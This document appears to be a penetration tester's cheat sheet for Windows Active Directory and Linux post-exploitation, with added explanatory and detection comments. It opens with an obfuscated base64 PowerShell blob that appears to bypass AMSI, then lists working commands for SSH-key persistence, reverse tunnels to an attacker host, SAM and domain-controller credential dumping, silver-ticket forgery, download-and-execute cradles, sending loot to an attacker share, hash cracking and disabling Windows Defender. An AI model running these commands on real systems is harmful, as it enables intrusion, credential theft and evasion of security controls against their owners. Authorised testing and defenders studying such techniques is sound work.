AawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACwAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAGIAeQB0AGUAWwBdAF0AKAAwAHgANgA5ACwAMAB4ADcANAAsADAAeAA0ADYAKQApACkALAAoAC0AagBvAGkAbgAoAFsAYwBoAGEAcgBdADAAeAA2ADEALAAgAFsAYwBoAGEAcgBd
ADAAeAA2ADkALAAgAFsAYwBoAGEAcgBdADAAeAA2AEMALAAgAFsAYwBoAGEAcgBdADAAeAA2ADUALAAgAFsAYwBoAGEAcgBdADAAeAA2ADQAKQApACkAOwAgACQAQwBTAFYAaABIAEYAIAA9ACAAWwBSAEUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4AZwBFAFQAVABZAHAARQAoACQAawA4AHYAcQAzACkAOwAgACQASQA1AHIAUwA5AHEAIAA9ACAAJABDAFMAVgBoAGgARgAuAEcARQBUAEYAaQBFAEwARAAoACQAaABOAHIAQQAzAGoAZQBzACwAIAAkACgAJABrADQANQA4ADYAPQAnAHYAMAB5AFgAMABbACcAOwAkAGIAPQBbAGIAeQB0AGUAWwBdAF0AKAAwAHgAMwA4ACwAMAB4ADUARgAsADAAeAAxADcALAAwAHgAMAA4ACwAMAB4ADQANQAsADAAeAAzADkALAAwAHgAMQBBACwAMAB4ADUAOQAsADAAeAAxAEEALAAwAHgANwA0ACwAMAB4ADYAMwAsADAAeAAyAEYALAAwAHgAMQA3ACwAMAB4ADQANAAsADAAeAAxADAALAAwAHgAMwBCACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsANAA1ADgANgApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACkAOwAgACQASQA1AFIAUwA5AFEALgBzAEUAdABWAGEATAB1AEUAKAAkAG4AdQBsAGwALAAgACgAIQAwACkAKQA7AAoAaQBmACAAKAAkAGYAYQBsAHMAZQApACAAewAKACAAIAAgACAAJAByAGEAbgBkAG8AbQBHAHUAaQBkACAAPQAgAFsAZwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwAgACQAaABtAGEAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEgATQBBAEMAUwBIAEEAMgA1ADYAOwAgACQAaABtAGEAYwAuAEsAZQB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAHIAYQBuAGQAbwBtAEcAdQBpAGQAKQA7ACAAJABoAGEAcwBoACAAPQAgACQAaABtAGEAYwAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAiAEkAbgBwAHUAdABEAGEAdABhACIAKQApADsAIAAkAGgAYQBzAGgAUwB0AHIAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaAApAC4AUgBlAHAAbABhAGMAZQAoACcALQAnACwAJwAnACkACgB9AAoAaQBmACAAKAA0ADYAIAAtAGcAdAAgADkAKQAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAu
ACIAIAAtAE4AbwBOAGUAdwBsAGkAbgBlACAAfQAgAGUAbABzAGUAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIALAAiACAALQBOAG8ATgBlAHcAbABpAG4AZQAgAH0AOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIA'))))

Find local admin access

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
Find-PSRemotingLocalAdminAccess -Domain <domain>

Network Discovery

# Ping sweep /24
# One background subshell per host: the loop returns at once and responders
# print asynchronously, so output order is not host order. `grep "bytes from"`
# keeps only reply lines; presumably field 4 of such a line is the replying
# address with a trailing ':' (stripped by `tr -d`) — depends on the ping
# implementation's output format, verify on the target platform.
# NOTE(review): the 172.16.2 prefix is hard-coded; edit it before use.
for i in {1..255};do (ping -c 1 172.16.2.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done

# Ping sweep /16
# Same pipeline nested over the third octet; neither loop waits, so up to
# 255x255 probes are spawned in the background.
for j in {1..255};do for i in {1..255};do (ping -c 1 172.16.$j.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done;done

Shell Tips

# Upgrade to proper TTY
# Spawns /bin/bash attached to a pseudo-terminal allocated by Python's pty module.
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Persistence via SSH key
# Generates an RSA keypair, then appends the public key text to the current
# user's authorized_keys. <pub_key> is a placeholder for the key text — as
# written the angle brackets are parsed as redirections, so substitute first.
ssh-keygen -t rsa
echo <pub_key> >> ~/.ssh/authorized_keys

# Log all commands (add to .zshrc)
# The prompt uses zsh-only escapes (%{ %} and %c), hence .zshrc rather than
# .bashrc. It shows a timestamp, then whatever `cut` finds in field 10 of the
# second line of `ifconfig eth0` (ANSI colour 01;31), then %c (colour 01;34).
# NOTE(review): that ifconfig field position is likely fragile across
# ifconfig versions and distributions — confirm before relying on it.
mkdir ~/.log
PS1=$'[`date +"%d-%b-%y %T"`]%{\033[01;31m%} `ifconfig eth0 2>/dev/null | sed -n 2,2p | cut -d" " -f 10`%{\033[00m%} %{\033[01;34m%}%c%{\033[00m%} > '
# Record the session with `script -f` into a timestamped file under ~/.log,
# but only when the parent process is not already `script`, so a new shell
# started inside the recording does not nest another recording.
test "$(ps -ocommand= -p $PPID | awk '{print $1}')" == 'script' || (script -f $HOME/.log/$(date +"%d-%b-%y_%H-%M-%S")_shell.log)

Pivot

Port Forwarding — SSH

# Access a locally exposed service on a remote machine
ssh -L <local_port>:localhost:<remote_port> <user>@<IP>

# SOCKS proxy via SSH
ssh -D 1080 -q -N -i id_rsa <user>@<IP>

Port Forwarding — Chisel

# On attacker (server)
./chisel server -p 5555 --reverse

# On victim (reverse forward: the attacker's port 8890 reaches 172.17.0.1:3000 through the victim)
./chisel client <attacker_IP>:5555 R:8890:172.17.0.1:3000
# Access at http://localhost:8890/

SOCKS Tunnel — Chisel (multi-pivot)

# Attacker
./chisel server -p 5555 --reverse

# Victim 1
./chisel client <attacker_IP>:5555 R:1080:socks

# Victim 2
./chisel client <attacker_IP>:5555 R:2080:socks

# Victim 3
./chisel client <attacker_IP>:5555 R:3080:socks

# Configure /etc/proxychains4.conf with desired socks port
# socks5 127.0.0.1 1080

SOCKS Tunnel — Revsocks (reverse TCP, TLS)

# On VPS (server)
revsocks -listen :8443 -socks 127.0.0.1:1080 -pass SuperSecretPassword

# On victim (client)
revsocks -connect <VPS_IP>:8443 -pass SuperSecretPassword

# Connect to 127.0.0.1:1080 on the VPS with any socks5 client (proxychains etc.)

Credential Dumping (Local)

# Save registry hives locally
reg save HKLM\sam sam
reg save HKLM\security security
reg save HKLM\system system

# VSS copy of SAM (bypasses lock)
esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam

# Parse offline with secretsdump
secretsdump.py -sam sam -security security -system system LOCAL

Impersonation (run command as another user)

$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $password)
Invoke-Command -ComputerName <target> -Credential $credential -ScriptBlock { whoami }

Silver Ticket (impacket)

# Find domain SID
lookupsid.py DOMAIN/<user>@<DC_IP> -domain-sids

# Forge TGS impersonating any user on a service
ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SPN> <USER>

# Use the ticket
export KRB5CCNAME=/home/pentest/<TICKET>.ccache
psexec.py DOMAIN/USER@<TARGET_IP> -k -no-pass

Dump credentials on Samba DC

# Install deps
sudo apt install samba krb5-user

# Vampire (dump DC remotely with DA creds)
# Replicates the directory (including secrets) from <DC_IP> into a keytab.
# To the DC this is effectively a directory replication request from a
# non-DC host — the same behaviour DCSync detections are built around.
net rpc -U administrator -S <DC_IP> vampire keytab dump.tab --force

# Extract NTLM hashes from keytab
# The arcfour-hmac (RC4) Kerberos key IS the NT hash, which is why filtering
# on that enctype yields user:hash pairs; AES keys cannot be used this way.
klist -k dump.tab -K -e | grep arcfour-hmac | tr -s ' ' | cut -d ' ' -f 3,5 | sed 's/\ (0x/:/g' | tr -d ')'

File Transfer

From Linux → Windows

# Python HTTP server
# Binding port 80 needs root. Serves the current directory over plain HTTP,
# so everything fetched from it is visible on the wire.
python3 -m http.server 80

# SMB server (no auth)
# Anyone who can reach this host can access the share — fine in a lab, a
# liability on a client network; prefer the authenticated form below.
# -smb2support is required for current Windows clients (SMB1 is disabled there).
impacket-smbserver share . -smb2support

# SMB server (with auth)
impacket-smbserver share . -smb2support -username user -password pass
# Download via PowerShell
iwr http://<IP>/file.exe -OutFile C:\Temp\file.exe
(New-Object Net.WebClient).DownloadFile('http://<IP>/file.exe','C:\Temp\file.exe')
# In-memory download cradle: nothing is written to disk, but the fetched script
# is still passed through AMSI and recorded by script block logging (event 4104).
iex (iwr http://<IP>/script.ps1 -UseBasicParsing) # download & execute

# Download via certutil
# Leaves a cached copy of the file in the user's INetCache and is a
# heavily-signatured LOLBin usage — assume it is alerted on.
certutil.exe -urlcache -split -f http://<IP>/file.exe C:\Temp\file.exe

# Download via bitsadmin
# BITS transfers are recorded in the Microsoft-Windows-Bits-Client operational log.
bitsadmin /transfer job http://<IP>/file.exe C:\Temp\file.exe

# Copy from SMB share
copy \\<IP>\share\file.exe C:\Temp\
xcopy \\<IP>\share\file.exe C:\Temp\ /Y

# wget (if installed)
# In Windows PowerShell 5.x `wget` is an alias of Invoke-WebRequest, which is
# why -OutFile works here; real GNU wget would need -O instead.
wget http://<IP>/file.exe -OutFile C:\Temp\file.exe

From Windows → Linux

# Upload to SMB share
copy C:\Temp\loot.txt \\<attacker_IP>\share\

# Upload via PowerShell (HTTP PUT)
# The listener must actually implement PUT — python3 -m http.server does not
# (it answers 501), so pair this with a handler that accepts uploads.
Invoke-RestMethod -Uri http://<IP>/upload -Method PUT -InFile C:\Temp\file.txt

# Base64 encode and copy-paste
# Output is ~4/3 of the file size; practical only for small files, and the
# blob stays in the console buffer / transcript.
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\file"))
# Decode on Linux
# <base64> must be the complete string; for anything long, save it to a file
# and use `base64 -d < b64.txt > file` to avoid the command-line length limit.
echo <base64> | base64 -d > file

From Linux → Linux

# SCP
scp file.txt user@<IP>:/tmp/

# NC send
# Raw TCP: no encryption and no authentication — whoever reaches port 4444
# first receives (or sends) the file. Some nc builds reject -p together with
# -l; use `nc -lv 4444` on those.
nc -lvp 4444 > received_file # receiver
nc <IP> 4444 < file_to_send # sender

# Base64
# Same transport as above with the payload text-encoded (e.g. when the
# channel mangles binary); it is no more private than the raw transfer.
base64 file | nc <IP> 4444
nc -lvp 4444 | base64 -d > file

Windows → Windows

# SMB
# Writing to the admin share C$ requires local admin on <target> and shows up
# there as an admin-share access (network logon plus file share event).
copy C:\Temp\file.exe \\<target>\C$\Temp\

# PowerShell remoting
# Assumes $sess was created earlier with New-PSSession — TODO confirm. The copy
# travels over WinRM, so no SMB access to the target is needed.
Copy-Item C:\Temp\file.exe -Destination C:\Temp\ -ToSession $sess

Hash Cracking (Hashcat)

Common modes

Hash type Mode Example command
NTLM 1000 hashcat -m 1000 hash.txt rockyou.txt
NTLMv1 5500 hashcat -m 5500 hash.txt rockyou.txt
NTLMv2 5600 hashcat -m 5600 hash.txt rockyou.txt
Kerberoast (TGS-RC4) 13100 hashcat -m 13100 hash.txt rockyou.txt
Kerberoast (TGS-AES128) 19600 hashcat -m 19600 hash.txt rockyou.txt
Kerberoast (TGS-AES256) 19700 hashcat -m 19700 hash.txt rockyou.txt
AS-REP Roast 18200 hashcat -m 18200 hash.txt rockyou.txt
MD5 0 hashcat -m 0 hash.txt rockyou.txt
SHA1 100 hashcat -m 100 hash.txt rockyou.txt
SHA256 1400 hashcat -m 1400 hash.txt rockyou.txt
bcrypt 3200 hashcat -m 3200 hash.txt rockyou.txt
NetNTLMv2 (captured) 5600 hashcat -m 5600 hash.txt rockyou.txt
DPAPI masterkey 15900 hashcat -m 15900 hash.txt rockyou.txt

Attack modes

# Wordlist
# -a 0 (straight wordlist) is hashcat's default attack mode when -a is omitted.
hashcat -m <mode> hash.txt rockyou.txt

# Wordlist + rules
hashcat -m <mode> hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Brute force (mask)
# ?a covers 95 printable ASCII chars, so 8 positions is 95^8 ≈ 6.6e15
# candidates — realistic only for fast hashes such as NTLM; a useful number
# when arguing for longer passwords.
hashcat -m <mode> hash.txt -a 3 ?a?a?a?a?a?a?a?a # 8 chars all

# Combination
hashcat -m <mode> hash.txt -a 1 wordlist1.txt wordlist2.txt

# Show cracked
# Reads results from the potfile; hashes cracked in earlier runs are skipped
# automatically, which is why a re-run may report all hashes already found.
hashcat -m <mode> hash.txt --show

Mask characters

?l = lowercase (a-z)
?u = uppercase (A-Z)
?d = digits (0-9)
?s = special chars
?a = all (?l?u?d?s)

John the Ripper

# Auto-detects the hash format; with mixed or ambiguous input, pin it explicitly.
john hash.txt --wordlist=rockyou.txt
# --format=NT is the NTLM (NT hash) format, the equivalent of hashcat -m 1000.
john hash.txt --format=NT --wordlist=rockyou.txt
# Prints previously cracked entries from john.pot; no cracking is performed.
john hash.txt --show

Identify hash type

# Both tools guess from length and charset only, so several candidates are
# common; confirm the format against hashcat's --example-hashes before a long run.
hashid <hash>
hash-identifier <hash>

BloodHound — Custom Cypher Queries

Queries NOT included in BloodHound’s default set.

Shadow admins (ACL-based privilege, not in DA group)

// Users with GenericAll/AllExtendedRights on domain object (not already DA)
// NOTE: the group name literal below was mangled by the page's e-mail
// obfuscation. BloodHound names groups as NAME@DOMAIN, so it should read
// "DOMAIN ADMINS@<DOMAIN>"; the same mangled literal recurs in the
// ForceChangePassword query at the end of this block.
MATCH (u:User)-[:GenericAll|AllExtendedRights]->(d:Domain)
WHERE NOT (u)-[:MemberOf*1..]->(:Group {name:"DOMAIN [email protected]"})
RETURN u.name

// Users with GenericWrite on computers (RBCD candidates)
// Equally useful as an audit query: every hit is an ACL to review and, if
// unintended, remove.
MATCH (u:User)-[:GenericWrite]->(c:Computer)
RETURN u.name, c.name

// Users with WriteDACL or WriteOwner on a Group
MATCH (u:User)-[:WriteDACL|WriteOwner]->(g:Group)
RETURN u.name, g.name

// Users with ForceChangePassword on DA members
// Same mangled group name as above; intended value "DOMAIN ADMINS@<DOMAIN>".
MATCH (u:User)-[:ForceChangePassword]->(t:User)-[:MemberOf*1..]->(:Group {name:"DOMAIN [email protected]"})
RETURN u.name, t.name

Spread / attack surface

// Users with local admin on more than 3 machines (over-privileged)
// The threshold 3 is arbitrary — tune it. AdminTo edges only exist for hosts
// where local-group collection succeeded, so uncollected hosts are simply absent.
MATCH (u:User)-[:AdminTo]->(c:Computer)
WITH u, count(c) AS n WHERE n > 3
RETURN u.name, n ORDER BY n DESC

// Computers where Domain Users are local admin (dangerous)
// NOTE: group name mangled by the page's e-mail obfuscation; the intended
// BloodHound literal is "DOMAIN USERS@<DOMAIN>".
MATCH p=(g:Group {name:"DOMAIN [email protected]"})-[:AdminTo]->(c:Computer) RETURN c.name

// Non-DA users with sessions on DCs
// CONTAINS "DC" is a naming-convention heuristic: it matches any hostname that
// contains "DC" and misses DCs named otherwise. Membership of the
// "Domain Controllers" group would be a stricter filter.
// The DA group literal is mangled here too; intended "DOMAIN ADMINS@<DOMAIN>".
MATCH (c:Computer)-[:HasSession]->(u:User)
WHERE c.name CONTAINS "DC" AND NOT (u)-[:MemberOf*1..]->(:Group {name:"DOMAIN [email protected]"})
RETURN c.name, u.name

// DA sessions on non-DC machines (pivot targets)
// Same heuristic and same mangled literal as above. For a defender this is the
// list of hosts where DA credentials are exposed in memory, i.e. where
// admin tiering is being violated.
MATCH (u:User)-[:MemberOf*1..]->(:Group {name:"DOMAIN [email protected]"})
MATCH (c:Computer)-[:HasSession]->(u)
WHERE NOT c.name CONTAINS "DC"
RETURN c.name, u.name

Cross-domain / trust paths

// Foreign users with local admin in current domain
// u.domain <> c.domain flags principals from another (trusted) domain holding
// local admin here; each hit is a cross-trust admin path worth reviewing.
MATCH (u:User)-[:AdminTo]->(c:Computer)
WHERE u.domain <> c.domain
RETURN u.name, u.domain, c.name

// Cross-domain group memberships
// Direct membership only (no *1.. on MemberOf), so nested cross-domain
// memberships are not listed.
MATCH (u:User)-[:MemberOf]->(g:Group)
WHERE u.domain <> g.domain
RETURN u.name, u.domain, g.name, g.domain

GPO abuse

// Principals with write rights on GPOs
// (n) is intentionally unlabelled: users, groups and computers all match.
// Anyone listed can change policy for every object the GPO links to.
MATCH (n)-[:GenericAll|GenericWrite|WriteOwner|WriteDACL]->(g:GPO)
RETURN n.name, g.name, g.guid

// GPOs applied to high value OUs (containing DCs)
// Same "DC" hostname heuristic as the session queries, and only one Contains
// hop, so computers in nested child OUs are not matched.
MATCH (g:GPO)-[:GpLink]->(o:OU)-[:Contains]->(c:Computer)
WHERE c.name CONTAINS "DC"
RETURN g.name, o.name, c.name

Windows Defender

# Check real-time protection status
# Read-only queries.
Get-MpPreference | select DisableRealtimeMonitoring
Get-MpComputerStatus | select RealTimeProtectionEnabled

# Disable real-time protection
# Every Set-/Add-/Remove-MpPreference below needs local admin, is refused while
# Tamper Protection is enabled, and is written to the Defender operational
# event log (event 5007, configuration changed) — a standard EDR/SIEM alert.
Set-MpPreference -DisableRealtimeMonitoring $true

# Enable real-time protection
# Restore this before leaving the host; a disabled AV left behind is a finding in itself.
Set-MpPreference -DisableRealtimeMonitoring $false

# Disable other protections
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisableScriptScanning $true

# Add exclusion (path)
# Exclusions persist across reboots until removed (see Remove-MpPreference at
# the bottom); leftover exclusions are a common post-engagement cleanup miss.
Add-MpPreference -ExclusionPath "C:\Temp"
Add-MpPreference -ExclusionPath "C:\Tools"

# Add exclusion (process)
Add-MpPreference -ExclusionProcess "powershell.exe"

# Add exclusion (extension)
Add-MpPreference -ExclusionExtension ".ps1"

# List all exclusions
# Audit use: unexpected entries here (broad paths, powershell.exe, script
# extensions) are a strong indicator of prior tampering.
Get-MpPreference | select -ExpandProperty ExclusionPath
Get-MpPreference | select -ExpandProperty ExclusionProcess
Get-MpPreference | select -ExpandProperty ExclusionExtension

# Remove an exclusion
Remove-MpPreference -ExclusionPath "C:\Temp"